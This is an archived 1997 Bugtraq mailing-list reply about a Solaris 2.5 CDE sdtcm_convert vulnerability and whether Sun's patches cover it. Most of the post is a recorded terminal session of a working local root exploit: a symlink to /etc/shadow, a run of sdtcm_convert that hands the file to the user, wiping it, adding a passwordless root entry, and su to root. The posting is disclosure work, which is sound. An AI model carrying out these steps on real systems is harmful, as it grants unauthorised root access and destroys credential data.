Bugtraq mailing list archives

Re: Security hole in Solaris 2.5 (sdtcm_convert) + exploit

From: adam () MATH TAU AC IL (Adam Morrison)
Date: Sun, 23 Feb 1997 12:45:40 +0200

Is this the bug fixed in the Sun patches:
103670-02: CDE 1.0.2: sdtcm_convert has a security vulnerability
103671-02: CDE 1.0.1: sdtcm_convert has a security vulnerability
103717-02: CDE 1.0.2: sdtcm_convert has a security vulnerability (x86 version)
103718-02: CDE 1.0.1: sdtcm_convert has a security vulnerability (x86 version)
or is it a new one?


That's hard to know, since this patch is not publicly available off
SunSolve (not right now, anyway).

There's at least one other hole in sdtcm_convert which this patch may or not
fix.

CDE is generally a can of worms.


$Id: sdtcm_convert,v 1.1 1996/07/14 17:44:54 adam Exp $

Script started on Thu Jul 11 22:15:03 1996
22:15  [wumpus:~] % whoami
adam
22:15  [wumpus:~] % ls -l /etc/shadow
-r--------   1 root     sys          291 Jul 11 22:14 /etc/shadow
22:15  [wumpus:~] % ln -s /etc/shadow /tmp/calorig.adam
22:15  [wumpus:~] % /usr/dt/bin/sdtcm_convert -d /tmp -v 3 adam
Loading the calendar ...

WARNING!! Data will be lost when converting version 4 data format
back to version 3 data format.

Do you want to continue? (Y/N) [Y] y

Doing conversion ...
Writing out new file ...
Conversion done successfully.
Total number of appointments                    = 0
Number of one-time appointments converted       = 0
Number of repeating appointments converted      = 0
Number of one-time appointments pruned          = 0
Number of repeating appointments pruned         = 0
The original file is saved in /tmp/calorig.adam
22:15  [wumpus:~] % ls -l /etc/shadow
-r--rw----   1 adam     daemon      3114 Jul 11 22:15 /etc/shadow
22:15  [wumpus:~] % chmod 644 /etc/shadow
22:15  [wumpus:~] % cp /dev/null /etc/shadow
cp: overwrite /etc/shadow (y/n)? y
22:15  [wumpus:~] % ls -l /etc/shadow
-rw-r--r--   1 adam     daemon         0 Jul 11 22:15 /etc/shadow
22:15  [wumpus:~] % echo "root::6445::::::" >> /etc/shadow
22:16  [wumpus:~] % su
# id
uid=0(root) gid=1(other)
# exit

script done on Thu Jul 11 22:16:21 1996



                                                adam?

Current thread:

Security hole in Solaris 2.5 (sdtcm_convert) + exploit Cristian SCHIPOR (Feb 22)
- Re: Security hole in Solaris 2.5 (sdtcm_convert) + exploit Casper Dik (Feb 22)
- <Possible follow-ups>
- Re: Security hole in Solaris 2.5 (sdtcm_convert) + exploit Adam Morrison (Feb 23)
  - Re: Security hole in Solaris 2.5 (sdtcm_convert) + exploit Shumon Huque (Feb 23)
    - Re: Security hole in Solaris 2.5 (sdtcm_convert) + exploit Brian Parent (Feb 24)
    - CIAC Bulletin H-32: HP-UX ppl Core Dump Vulnerability Aleph One (Feb 24)
    - IRIX 5.3 /var/rfindd/fsdump - exploit Chris Sheldon (Feb 25)
    - Re: IRIX 5.3 /var/rfindd/fsdump - exploit Yuri Volobuev (Feb 25)
    - Re[2]: [NTSEC] ! [ADVISORY] Major Security Hole in MS ASP daragh_malone () TELECOM IE (Feb 25)
    - ** >= Ascend 5.0A SECURITY ALERT ** Kit Knox (Feb 26)
  - libX11 David Sacerdote (Feb 24)